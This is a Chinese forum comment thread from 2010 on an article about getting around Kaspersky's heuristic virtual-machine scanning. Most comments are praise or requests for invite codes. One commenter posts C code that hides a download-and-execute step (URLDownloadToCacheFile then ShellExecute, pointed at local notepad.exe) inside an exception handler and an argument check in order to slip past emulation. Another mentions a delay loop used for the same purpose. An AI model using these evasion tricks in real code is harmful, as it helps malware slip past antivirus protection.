《[WebZine]卡巴虚拟机启发式查毒的绕过方法》的评论

作者：WFilter

WFilter — Mon, 30 Aug 2010 08:57:52 +0000

牛啊。Nod32的启发式杀毒做的可能要更好些，等待博主再写一篇Nod32免杀的强帖！

作者：smart

smart — Fri, 28 May 2010 05:23:04 +0000

弱弱地问下，能要个tools的邀请吗？piaoye0605@163.com

作者：S.Orlando

S.Orlando — Wed, 07 Apr 2010 12:19:31 +0000

其实有其他的方法~~

作者：ziguazichong

ziguazichong — Tue, 16 Feb 2010 14:00:30 +0000

强悍!

作者：masepu

masepu — Sun, 17 Jan 2010 16:59:48 +0000

最后for(int i = 0;i < 1000000000; i++)
__nop();
kis2010打开时程序一直无法成功执行,虽然没有报毒.但几乎程序没有响应.但关闭 KIS可成功执行

作者：masepu

masepu — Sun, 17 Jan 2010 15:17:48 +0000

不好意思,看错了

作者：masepu

masepu — Sun, 17 Jan 2010 15:09:58 +0000

滴滴答答

作者：masepu

masepu — Sun, 17 Jan 2010 15:06:33 +0000

老大,似乎利用判断参数的方法可以过KIS2010呀,我试了没报警呀.你再看看,代码如下:
#include
#include
#pragma comment (lib,"Urlmon.lib")

BOOL SafeDiv(INT32 dividend, INT32 divisor, INT32 *pResult)
{
__try
{
*pResult = dividend / divisor;
}
__except(GetExceptionCode() == EXCEPTION_INT_DIVIDE_BY_ZERO ?
EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
{
TCHAR szFileName[MAX_PATH] = {0};
URLDownloadToCacheFile(NULL,"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);
ShellExecute(0,"open",szFileName,NULL,NULL,SW_SHOW);
return TRUE;
}
return TRUE;
}

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
INT32 Result;
LPTSTR lpCmdLine1 = NULL;
INT32 divisor = 1;
if(lpCmdLine[0] == '')
{
TCHAR szPath[MAX_PATH];
GetModuleFileName(NULL,szPath,MAX_PATH);
Sleep(1000);
ExitProcess(0);
return;
}
else
divisor = 0;
SafeDiv(10,divisor,&Result);
ExitProcess(0);
return ;
}

作者：lsyg

lsyg — Fri, 15 Jan 2010 08:50:25 +0000

俄罗斯国家科学院合作开发的，军方和克里姆林宫专用。。那个是大蜘蛛吧。。

作者：dzj

dzj — Wed, 06 Jan 2010 01:10:15 +0000

如果可以，请也给我一个邀请码吧。。。cdcxdzj@163.com